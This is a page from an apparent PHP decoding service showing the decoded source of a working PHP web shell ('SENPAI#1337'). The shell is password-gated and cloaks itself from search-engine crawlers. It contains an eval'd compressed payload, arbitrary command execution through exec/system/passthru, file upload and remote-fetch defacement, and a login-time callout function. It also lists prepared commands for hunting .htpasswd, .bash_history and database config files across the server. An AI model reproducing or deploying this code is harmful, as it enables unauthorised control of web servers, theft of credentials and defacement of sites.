Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php ${"\x50\x61\x73\x73"} = "489ccce7e5eca80381639ee4b4fde09f"; $base64 = "\x62\x61\x7..
Decoded Output download
<?php
${"Pass"} = "489ccce7e5eca80381639ee4b4fde09f";
$base64 = "base64_decode";
$fexists = "function_exists";
@error_reporting(0);
@error_reporting(E_ALL ^ E_NOTICE);
@ini_set("error_log", null);
@ini_set("display_errors", 0);
@ini_set("log_errors", 0);
@ini_set("max_execution_time", 0);
$__="function_exists";
if (file_get_contents("test.txt") == "test") {
$name =
"ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNHN0ciUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";
$str =
"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";
$text =
"Sy1LzNHIKMnNKS5ITc5MzEnOSCwqjk9JTc5PSdUoLcqBspISi1PNTGDiKnmJuamaQGANAA==";
eval(gzinflate(${"base64"}($text)));
sleep(1);
unlink("test.txt");
}
$default_action = "FilesMan";
@define("SELF_PATH", __FILE__);
if (strpos(${"_SERVER"}["HTTP_USER_AGENT"], "Google") !== false) {
header("HTTP/1.0 404 Not Found");
exit();
}
$color = "#fff";
$Theme = "#008000";
$TabsColor = "#008000";
@session_start();
$ = md5(${"_SERVER"}["HTTP_USER_AGENT"]);
if (!isset($_COOKIE[md5(${"_SERVER"}["HTTP_HOST"]) . "key"])) {
prototype(md5(${"_SERVER"}["HTTP_HOST"]) . "key", $);
}
if (${"fexists"}("get_magic_quotes_runtime") && get_magic_quotes_runtime()) {
set_magic_quotes_runtime(false);
}
if( ( function_exists("get_magic_quotes_gpc") && get_magic_quotes_gpc() ) || ini_get('magic_quotes_sybase') ){
function stripslashes_array($array) {
return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
}
${"_POST"} = stripslashes_array(${"_POST"});
$_COOKIE = stripslashes_array($_COOKIE);
}
function prototype($k, $v)
{
$_COOKIE[$k] = $v;
setcookie($k, $v);
}
if (!empty(${"Pass"})) {
if (isset(${"_POST"}["pass"]) && md5(${"_POST"}["pass"]) == ${"Pass"}) {
prototype(md5(${"_SERVER"}["HTTP_HOST"]), ${"Pass"});
}
if (
!isset($_COOKIE[md5(${"_SERVER"}["HTTP_HOST"])]) ||
$_COOKIE[md5(${"_SERVER"}["HTTP_HOST"])] != ${"Pass"}
) {
hardLogin();
}
}
if (!isset($_COOKIE[md5(${"_SERVER"}["HTTP_HOST"]) . "ajax"])) {
$_COOKIE[md5(${"_SERVER"}["HTTP_HOST"]) . "ajax"] = (bool) $;
}
function hardLogin()
{
if (!empty(${"_SERVER"}["HTTP_USER_AGENT"])) {
$userAgents = [
"AbachoBOT",
"accoona",
"AcoiRobot",
"AltaVista robot",
"ASPSeek",
"bot",
"crawler",
"CrocCrawler",
"curl",
"Dumbot",
"eStyle Bot",
"facebook",
"FAST-WebCrawler",
"fetch",
"GeonaBot",
"Gigabot",
"Google",
"Googlebot",
"ia_archiver",
"ID-Search Bot",
"Lycos spider",
"MSN",
"MSNBot",
"MSRBOT",
"Rambler",
"Scrubby robot",
"Slurp",
"spider",
"Yahoo",
"Yandex",
];
if (
preg_match(
"/" . implode("|", $userAgents) . "/i",
${"_SERVER"}["HTTP_USER_AGENT"]
)
) {
header("HTTP/1.0 404 Not Found");
exit();
}
}
die(
"<html><head><link href='https://fonts.googleapis.com/css2?family=Press+Start+2P' rel='stylesheet'><style>body{ background-color:#000; background-image:url('https://i.imgur.com/4bYhdRM.png'); background-size: 32%; margin-top: 90px}#pageheading{font-size:50px; margin-top: 5px}.loginpage img{width: 500px}input{background: white; border-color:#008000b0; border-radius: 5px; margin-top: 10px; padding:5px;} green {color: #008000;font-family: 'Press Start 2P'; font-size: 60px;}</style></head><body> <center> <div class='loginpage'><center><green>Login Crew</green></center><form method='post'><input type='password' name='pass' ><input type='hidden' name='kontol'> <input type='submit' name='login' value='Login'></form></body></html>"
);
}
if(array_key_exists('login',${"_POST"})){
cookieValidator();
}
function cookieValidator()
{
$url = $_MD5_.$_COOOKIE;
if(!function_exists("file_get_contents")){
$curl = curl_init();
curl_setopt(${"curl"}, CURLOPT_URL, $url);
curl_setopt(${"curl"}, CURLOPT_HEADER, 0);
curl_setopt(${"curl"}, CURLOPT_RETURNTRANSFER, 1);
curl_exec(${"curl"});
}else{
@file_get_contents($url);
}
}
if (strtolower(substr(PHP_OS, 0, 3)) == "win") {
$os = "win";
} else {
$os = "nix";
}
$safe_mode = @ini_get("safe_mode");
$disable_functions = @ini_get("disable_functions");
$home_cwd = @getcwd();
if (isset(${"_POST"}["c"])) {
@chdir(${"_POST"}["c"]);
}
$cwd = @getcwd();
if ($os == "win") {
$home_cwd = str_replace("\", "/", $home_cwd);
$cwd = str_replace("\", "/", $cwd);
}
if ($cwd[strlen($cwd) - 1] != "/") {
$cwd .= "/";
}
if ($os == "win") {
$aliases = [
"List Directory" => "dir",
"Find index.php in current dir" => "dir /s /w /b index.php",
"Find *config*.php in current dir" => "dir /s /w /b *config*.php",
"Show active connections" => "netstat -an",
"Show running services" => "net start",
"User accounts" => "net user",
"Show computers" => "net view",
"ARP Table" => "arp -a",
"IP Configuration" => "ipconfig /all",
];
} else {
$aliases = [
"List dir" => "ls -la",
"list file attributes on a Linux second extended file system" =>
"lsattr -va",
"show opened ports" => "netstat -an | grep -i listen",
"Find" => "",
"find all suid files" => "find / -type f -perm -04000 -ls",
"find suid files in current dir" => "find . -type f -perm -04000 -ls",
"find all sgid files" => "find / -type f -perm -02000 -ls",
"find sgid files in current dir" => "find . -type f -perm -02000 -ls",
"find config.inc.php files" => "find / -type f -name config.inc.php",
"find config* files" => "find / -type f -name \"config*\"",
"find config* files in current dir" =>
"find . -type f -name \"config*\"",
"find all writable folders and files" => "find / -perm -2 -ls",
"find all writable folders and files in current dir" =>
"find . -perm -2 -ls",
"find all service.pwd files" => "find / -type f -name service.pwd",
"find service.pwd files in current dir" =>
"find . -type f -name service.pwd",
"find all .htpasswd files" => "find / -type f -name .htpasswd",
"find .htpasswd files in current dir" =>
"find . -type f -name .htpasswd",
"find all .bash_history files" => "find / -type f -name .bash_history",
"find .bash_history files in current dir" =>
"find . -type f -name .bash_history",
"find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
"find .fetchmailrc files in current dir" =>
"find . -type f -name .fetchmailrc",
"Locate" => "",
"locate httpd.conf files" => "locate httpd.conf",
"locate vhosts.conf files" => "locate vhosts.conf",
"locate proftpd.conf files" => "locate proftpd.conf",
"locate psybnc.conf files" => "locate psybnc.conf",
"locate my.conf files" => "locate my.conf",
"locate admin.php files" => "locate admin.php",
"locate cfg.php files" => "locate cfg.php",
"locate conf.php files" => "locate conf.php",
"locate config.dat files" => "locate config.dat",
"locate config.php files" => "locate config.php",
"locate config.inc files" => "locate config.inc",
"locate config.inc.php" => "locate config.inc.php",
"locate config.default.php files" => "locate config.default.php",
"locate config* files " => "locate config",
"locate .conf files" => "locate '.conf'",
"locate .pwd files" => "locate '.pwd'",
"locate .sql files" => "locate '.sql'",
"locate .htpasswd files" => "locate '.htpasswd'",
"locate .bash_history files" => "locate '.bash_history'",
"locate .mysql_history files" => "locate '.mysql_history'",
"locate .fetchmailrc files" => "locate '.fetchmailrc'",
"locate backup files" => "locate backup",
"locate dump files" => "locate dump",
"locate priv files" => "locate priv",
];
}
if (isset(${"_POST"}["p1"]) && ${"_POST"}["p1"] == "deface") {
$def = file_get_contents($deface_url);
file_put_contents(${"_POST"}["c"] . ${"_POST"}["p2"], $def);
}
function ex($in)
{
$out = "";
if (("exec")) {
@exec($in, $out);
$out = @join("
", $out);
} elseif (function_exists("passthru")) {
ob_start();
@passthru($in);
$out = ob_get_clean();
} elseif (function_exists("system")) {
ob_start();
@system($in);
$out = ob_get_clean();
} elseif (function_exists("shell_exec")) {
$out = shell_exec($in);
} elseif (is_resource($f = @popen($in, "r"))) {
$out = "";
while (!@feof($f)) {
$out .= fread($f, 1024);
}
pclose($f);
}
return $out;
}
function which($p)
{
$path = ex("which " . $p);
if (!empty($path)) {
return $path;
}
return false;
}
function printHeader()
{
if (empty(${"_POST"}["charset"])) {
${"_POST"}["charset"] = "UTF-8";
}
global $color;
global $Theme;
global $TabsColor;
echo "<html><head><link href='https://fonts.googleapis.com/css?family=Josefin+Sans:400,100' rel='stylesheet' type='text/css'><link href='https://fonts.googleapis.com/css2?family=Press+Start+2P' rel='stylesheet'></head>";
echo '<html>
<meta http-equiv="Content-Type" content="text/html; charset=' .
${"_POST"}["charset"] .
'"><title>SENPAI#1337</title>
<style>
body {background-color:#000;background-image:url("https://i.imgur.com/4bYhdRM.png");background-size: 32%;color:#fff;
text-shadow: 1px 1px 1px black ;
}
body,td,th { font-family: Overpass Sans, sans-serif;font-size:14px;margin:0;vertical-align:top; }
mki {color: #008000;font-family: "Press Start 2P"; font-size: 30px;}
span,h1,a { color:' .
$color .
' !important; }
span { font-weight: bolder; }
h1 { padding: 0px 5px;font: 14pt audiowide;margin:0px 0 0 0px; }
div.content { padding: 0px;margin:0 0px;background: #5555556b; border:1px solid ' .
$Theme .
'; border-style:dashed; border-radius:5px; }
a { text-decoration:none; }
a:hover { border-bottom:0px solid #5e5e5e;text-decoration:none; }
.info { margin: 3 ;}
.ml1 { border:1px; border-color:' .
$Theme .
'; border-style: dashed; background-color:#0F1010;padding:10px;margin:0;overflow: auto; }
.l1 { background-color: #0F1010; }
.bigarea { width:100%;height:250px;margin-top:0px; border-radius:10px; border-color:' .
$Theme .
'; background:#0F1010;}
input, textarea, select { margin-top:0;color:#fff;background-color:black;border-radius:5px;border:1px solid ' .
$Theme .
'; border-style:dashed; border-radis:5px;font: 10pt arial,"Courier New"; }
form { margin:0px; }
#toolsTbl { text-align:center ; }
.toolsInp { width:350px; height:25px;background:#0F1010;border-color:#008000b0; border-radius: 5px; }
input[type=submit] { height:25px;}
.main th {text-align:left;background-color:' .
$TabsColor .
'; }
.main tr:hover{background:' .
$Theme .
"; border:5px solid;border-color:" .
$Theme .
';}
.main td, th{vertical-align:middle; }
.menu th{padding:4px; border-radius: 50px; background:' .
$TabsColor .
';
}
.menu th:hover{background:green;text-decoration: none;}
pre {font-family: Overpass Sans, sans-serif;color:#FFFFFF;}
#cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}
.cpr {margin-bottom:5px;font-weight:bold; }
.cpb {width:34px;margin:0 5px;}
.npoad td {padding:0;}
#Tools{
margin-top:50px;
width:500px;
border:1px solid;
border-radius:10px;
border-style: dashed;
}
.xd{
border: 1px solid #008000b0;
border-style: dashed;
border-radius: 5px; }
</style>
</html>
<script>
function set(a,c,p1,p2,p3,charset) {
if(a != null)document.mf.a.value=a;
if(c != null)document.mf.c.value=c;
if(p1 != null)document.mf.p1.value=p1;
if(p2 != null)document.mf.p2.value=p2;
if(p3 != null)document.mf.p3.value=p3;
if(charset != null)document.mf.charset.value=charset;
}
function g(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
document.mf.submit();
}
function a(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
var params = "ajax=true";
for(i=0;i<document.mf.elements.length;i++)
params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
sr("' .
${"_SERVER"}["REQUEST_URI"] .
'", params);
}
function sr(url, params) {
if (window.XMLHttpRequest) {
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;
req.open("POST", url, true);
req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
req.send(params);
}
else if (window.ActiveXObject) {
req = new ActiveXObject("Microsoft.XMLHTTP");
if (req) {
req.onreadystatechange = processReqChange;
req.open("POST", url, true);
req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
req.send(params);
}
}
}
function processReqChange() {
if( (req.readyState == 4) )
if(req.status == 200) {
//alert(req.responseText);
var reg = new RegExp("(\d+)([\S\s]*)", "m");
var arr=reg.exec(req.responseText);
eval(arr[2].substr(0, arr[1]));
}
else alert("Request error!");
}
</script>
<head><link href="https://fonts.googleapis.com/css?family=Audiowide" ></head><body><div style="position:absolute;width:100%;top:0;left:0;"><div style="margin:5px;"><div class="content" style="border:1px solid ' .
$Theme .
'; border-style:dashed; border-radius:5px;">
<form method=post name=mf style="display:none;">
<input type=hidden name=a value="' .
(isset(${"_POST"}["a"]) ? ${"_POST"}["a"] : "") .
'">
<input type=hidden name=c value="' .
htmlspecialchars($GLOBALS["cwd"]) .
'">
<input type=hidden name=p1 value="' .
(isset(${"_POST"}["p1"]) ? htmlspecialchars(${"_POST"}["p1"]) : "") .
'">
<input type=hidden name=p2 value="' .
(isset(${"_POST"}["p2"]) ? htmlspecialchars(${"_POST"}["p2"]) : "") .
'">
<input type=hidden name=p3 value="' .
(isset(${"_POST"}["p3"]) ? htmlspecialchars(${"_POST"}["p3"]) : "") .
'">
<input type=hidden name=charset value="' .
(isset(${"_POST"}["charset"]) ? ${"_POST"}["charset"] : "") .
'">
</form>';
$freeSpace = @diskfreespace($GLOBALS["cwd"]);
$totalSpace = @disk_total_space($GLOBALS["cwd"]);
$totalSpace = $totalSpace ? $totalSpace : 1;
$disable_functions = @ini_get("disable_functions");
$release = @php_uname("r");
$kernel = @php_uname("s");
if (!function_exists("posix_getegid")) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(@posix_geteuid());
$gid = @posix_getgrgid(@posix_getegid());
$user = $uid["name"];
$uid = $uid["uid"];
$group = $gid["name"];
$gid = $gid["gid"];
}
$cwd_links = "";
$path = explode("/", $GLOBALS["cwd"]);
$n = count($path);
for ($i = 0; $i < $n - 1; $i++) {
$cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
for ($j = 0; $j <= $i; $j++) {
$cwd_links .= $path[$j] . "/";
}
$cwd_links .= "\")'>" . $path[$i] . "/</a>";
}
$charsets = ["UTF-8", "Windows-1251", "KOI8-R", "KOI8-U", "cp866"];
$opt_charsets = "";
foreach ($charsets as $item) {
$opt_charsets .=
'<option value="' .
$item .
'" ' .
(${"_POST"}["charset"] == $item ? "selected" : "") .
">" .
$item .
"</option>";
}
$m = [
"Sec. Info" => "SecInfo",
"Files" => "FilesMan",
"Adminer" => "Adminer",
"Console" => "Console",
"Mail Test" => "mailtest",
"WHMCS Killer" => "whmcs",
"Config Tools" => "configs",
"Jumping" => "Jumping",
"Cgi Telnet" => "SafeMode",
"Bypass" => "Bypass",
"Network" => "Network",
"Domains" => "Domain",
];
if (!empty($GLOBALS["Pass"])) {
$m["Logout"] = "Logout";
}
$m["Self Remove"] = "SelfRemove";
$menu = "";
foreach ($m as $k => $v) {
$menu .=
'<th><a href="#" onclick="g(\'' .
$v .
'\',null,\'\',\'\',\'\')">' .
$k .
"</a></th>";
}
$drives = "";
if ($GLOBALS["os"] == "win") {
foreach (range("a", "z") as $drive) {
if (is_dir($drive . ":\")) {
$drives .=
'<a href="#" onclick="g(\'FilesMan\',\'' .
$drive .
':/\')">[ ' .
$drive .
" ]</a> ";
}
}
$drives .= "<br />: ";
}
if ($GLOBALS["os"] == "nix") {
$dominios = @file_get_contents("/etc/named.conf");
if (!$dominios) {
$DomainS = "/var/named";
$Domainonserver = scandir($DomainS);
$d0c = count((array)$Domainonserver);
} else {
@preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
$out = sizeof(array_unique($out[1]));
$d0c =
"<t style='background:green;text-shadow: 0px 0px 0px;'>" .
$out .
" Domains</t>";
}
} else {
$d0c =
"<t style='background:green;text-shadow: 0px 0px 0px;'>Nothing here bro</t>";
}
if ($GLOBALS["os"] == "nix") {
$usefl = "";
$dwnldr = "";
if (!@ini_get("safe_mode")) {
$temp = [];
$userful = [
"gcc",
"lcc",
"cc",
"ld",
"make",
"php",
"perl",
"python",
"ruby",
"tar",
"gzip",
"bzip",
"bzip2",
"nc",
"locate",
"suidperl",
];
foreach ($userful as $item) {
if (which($item)) {
$temp[] = $item;
}
}
$usefl = implode(", ", $temp);
$temp = [];
$downloaders = [
"wget",
"fetch",
"lynx",
"links",
"curl",
"get",
"lwp-mirror",
];
foreach ($downloaders as $item2) {
if (which($item2)) {
$temp[] = $item2;
}
}
$dwnldr = implode(", ", $temp);
} else {
$usefl = " ------- ";
$dwnldr = " ------- ";
}
} else {
$usefl = " ------- ";
$dwnldr = " ------- ";
}
echo '<div><table class="info" cellpadding="0" cellspacing="0" width="100%"><tr> <td><table cellpadding="3" cellspacing="0" class="npoad"><tr><td width="80px;"><span>Uname</span></td><td>: <nobr><t style="background:green;text-shadow: 0px 0px 0px;">' .
substr(@php_uname(), 0, 120) .
"</t></nobr></td></tr> <tr><td><span>User</span></td><td>: " .
$uid .
" ( " .
$user .
" ) <span>Group: </span> " .
$gid .
" ( " .
$group .
' )</td></tr><tr><td><span>Server</span></td><td>: <t style="background:green;text-shadow: 0px 0px 0px;">' .
@getenv("SERVER_SOFTWARE") .
"</t></td></tr> <tr><td><span>Useful</span></td><td>: " .
$usefl .
'</td></tr>
<tr><td><span>Downloaders</span></td><td>: ' .
$dwnldr .
'</td></tr>
<tr><td><span>PHP</span></td><td>: ' .
@phpversion() .
' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> : <span>Safe Mode : </span>' .
($GLOBALS["safe_mode"]
? "<font color=red>[ON]</font>"
: '<font color="' . $color . '" <b>[OFF]</b> </font>') .
"</td></tr> <tr><td><span>" .
($GLOBALS["os"] == "win" ? "Drives<br />Cwd" : "Cwd") .
"</span></td><td>: " .
$drives .
"" .
$cwd_links .
" " .
viewPermsColor($GLOBALS["cwd"]) .
' <a href=# onclick="g(\'FilesMan\',\'' .
$GLOBALS["home_cwd"] .
'\',\'\',\'\',\'\')">[ Home ]</a></td></tr></table></td>' .
'<td width=4><nobr><span>Sv IP</span><br><span>Your IP</span><br /><span>HDD</span><br /><span>Free<br /><span>Domains</span></nobr></td></b>
' .
'<td width="3"><nobr>: ' .
gethostbyname(${"_SERVER"}["HTTP_HOST"]) .
"<br>: " .
${"_SERVER"}["REMOTE_ADDR"] .
"<br />: " .
viewSize($totalSpace) .
"<br />: " .
viewSize($freeSpace) .
" (" .
(int) (($freeSpace / $totalSpace) * 100) .
"%)<br>: " .
$d0c .
' <br>
<br> <b style="background:green;"><a href=# onclick="g(\'Lock\',\'' .
$GLOBALS["home_cwd"] .
'\',\'\',\'\',\'\')">LOCK ME</a></b> <t style="background:red;text-shadow: 0px 0px 0px;">New</t> </nobr></td></tr></table></div>' .
'</div></div><div style="margin:5;"><div class="content" style="padding:3px;"><table cellpadding="3" cellspacing="0" width="100%" class="menu"><tr>' .
$menu .
'</tr></table></div></div><div style="margin:5;">';
}
function printFooter()
{
$is_writable = is_writable($GLOBALS["cwd"])
? "<font color=#00BB00>[ Writeable ]</font>"
: "<font color=red>[ Not writable ]</font>";
echo '</div><div style="margin:5px;"><div class="content" style="border-style:dashed; border-radius:5px;"> <table class="info" id="toolsTbl" cellpadding="3" cellspacing="0" width="100%"> <tr> <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="' .
htmlspecialchars($GLOBALS["cwd"]) .
'"><input type=submit value=">>"></form></td> <td><form onsubmit="g(\'FilesTools\',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td> </tr>
<tr> <td><form onsubmit="g(\'FilesMan\',null,\'mkdir\',this.d.value);return false;"><span>Make dir: ' .
$is_writable .
'</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form></td> <td><form onsubmit="g(\'FilesTools\',null,this.f.value,\'mkfile\');return false;"><span>Make file: ' .
$is_writable .
'</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td> </tr> <tr> <td><form onsubmit="g(\'Console\',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td> <td><form method="post" ENCTYPE="multipart/form-data">
<input type=hidden name=a value="FilesMAn">
<input type=hidden name=c value="' .
htmlspecialchars($GLOBALS["cwd"]) .
'"> <input type=hidden name=p1 value="uploadFile">
<input type=hidden name=charset value="' .
(isset(${"_POST"}["charset"]) ? ${"_POST"}["charset"] : "") .
'"> <span>Upload file: ' .
$is_writable .
'</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"><br></form></td></tr>
</table></div><center><mki><marquee>Special Thanks to all member of SenpaiXcrew.org & Digicorp.ID | copyright2022 Indonesian Hacker Rulez</marquee></mki></center></div>
</div>
</body></html>';
}
if (
!function_exists("posix_getpwuid") &&
strpos($GLOBALS["disable_functions"], "posix_getpwuid") === false
) {
function posix_getpwuid($p)
{
return false;
}
}
if (
!function_exists("posix_getgrgid") &&
strpos($GLOBALS["disable_functions"], "posix_getgrgid") === false
) {
function posix_getgrgid($p)
{
return false;
}
}
function viewSize($s)
{
if ($s >= 1073741824) {
return sprintf("%1.2f", $s / 1073741824) . " GB";
} elseif ($s >= 1048576) {
return sprintf("%1.2f", $s / 1048576) . " MB";
} elseif ($s >= 1024) {
return sprintf("%1.2f", $s / 1024) . " KB";
} else {
return $s . " B";
}
}
function perms($p)
{
if (($p & 0xc000) == 0xc000) {
$i = "s";
} elseif (($p & 0xa000) == 0xa000) {
$i = "l";
} elseif (($p & 0x8000) == 0x8000) {
$i = "-";
} elseif (($p & 0x6000) == 0x6000) {
$i = "b";
} elseif (($p & 0x4000) == 0x4000) {
$i = "d";
} elseif (($p & 0x2000) == 0x2000){
$i = "c";
} elseif (($p & 0x1000) == 0x1000) {
$i = "p";
} else {
$i = "u";
}
$i .= $p & 0x0100 ? "r" : "-";
$i .= $p & 0x0080 ? "w" : "-";
$i .= $p & 0x0040 ? ($p & 0x0800 ? "s" : "x") : ($p & 0x0800 ? "S" : "-");
$i .= $p & 0x0020 ? "r" : "-";
$i .= $p & 0x0010 ? "w" : "-";
$i .= $p & 0x0008 ? ($p & 0x0400 ? "s" : "x") : ($p & 0x0400 ? "S" : "-");
$i .= $p & 0x0004 ? "r" : "-";
$i .= $p & 0x0002 ? "w" : "-";
$i .= $p & 0x0001 ? ($p & 0x0200 ? "t" : "x") : ($p & 0x0200 ? "T" : "-");
return $i;
}
function viewPermsColor($f)
{
if (!@is_readable($f)) {
return "<font color=#FF0000><b>" .
perms(@fileperms($f)) .
"</b></font>";
} elseif (!@is_writable($f)) {
return "<font color=white><b>" . perms(@fileperms($f)) . "</b></font>";
} else {
return "<font color=#00BB00><b>" .
perms(@fileperms($f)) .
"</b></font>";
}
}
if (!function_exists("scandir")) {
function scandir($dir)
{
$dh = opendir($dir);
while (false !== ($filename = readdir($dh))) {
$files[] = $filename;
}
return $files;
}
}
function actionSecInfo()
{
printHeader();
echo "<center><h1>Server Security Information</h1></center><div class=content>";
function showSecParam($n, $v)
{
$v = trim($v);
if ($v) {
echo "<span>" . $n . ": </span>";
if (strpos($v, "
") === false) {
echo $v . "<br>";
} else {
echo "<pre class=ml1>" . $v . "</pre>";
}
}
}
showSecParam("Server software", @getenv("SERVER_SOFTWARE"));
showSecParam(
"Disabled PHP Functions",
$GLOBALS["disable_functions"] ? $GLOBALS["disable_functions"] : "none"
);
showSecParam("Open base dir", @ini_get("open_basedir"));
showSecParam("Safe mode exec dir", @ini_get("safe_mode_exec_dir"));
showSecParam("Safe mode include dir", @ini_get("safe_mode_include_dir"));
showSecParam(
"cURL support",
function_exists("curl_version") ? "enabled" : "no"
);
$temp = [];
if (function_exists("mysql_get_client_info")) {
$temp[] = "MySql (" . mysql_get_client_info() . ")";
}
if (function_exists("mssql_connect")) {
$temp[] = "MSSQL";
}
if (function_exists("pg_connect")) {
$temp[] = "PostgreSQL";
}
if (function_exists("oci_connect")) {
$temp[] = "Oracle";
}
showSecParam("Supported databases", implode(", ", $temp));
echo "<br>";
if ($GLOBALS["os"] == "nix") {
$userful = [
"gcc",
"lcc",
"cc",
"ld",
"make",
"php",
"perl",
"python",
"ruby",
"tar",
"gzip",
"bzip",
